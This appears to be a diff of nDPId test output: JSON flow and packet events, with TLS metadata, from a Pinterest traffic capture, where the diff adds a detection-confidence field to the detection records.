+02790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714782,"flow_last_seen":1605289714782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289714782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605289714782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714782,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqIAAAAAoAL9IEOtAAACBAWgBAIICnRgZN4AAAAAAQMDBw=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605289714832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714832,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbve2qyyOFrOS7qjoBJXgB0bAAACBAV4AQMDAwQCCArCuSSHdGBk3g=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605289714832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714832,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqOssjhbgBAB+6D6AAABAQgKdGBlEMK5JIc="}
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-03186{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,resources.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}}
+00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+03212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,resources.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}}
 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715133,"flow_last_seen":1605289715133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289715133,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605289715133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715133,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfcAAAAAoAL9IJHxAAACBAWgBAIICjiITggAAAAAAQMDBw=="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605289715210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715210,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJfoEpGV7hz5n4oBJXgLSTAAACBAV4AQMDAwQCCArCuSXYOIhOCA=="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2781,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605289715210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289715210,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfiBKRlfgBAB+zhYAAABAQgKOIhOVcK5Jdg="}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715221,"flow_last_seen":1605289715221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289715221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605289715221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715221,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0CzwAAAAAoAL9ILgWAAACBAWgBAIICnB0noAAAAAAAQMDBw=="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3385,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605289715273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715273,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUkNYqBSe29As9oBJXgJmfAAACBAV4AQMDAwQCCArCuSYncHSegA=="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3387,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605289715273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289715273,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0Cz3WKgUogBAB+x19AAABAQgKcHSetMK5Jic="}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715274,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715274,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIYAAAAAoAL9IIqeAAACBAWgBAIICrhM3AoAAAAAAQMDBw=="}
-00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
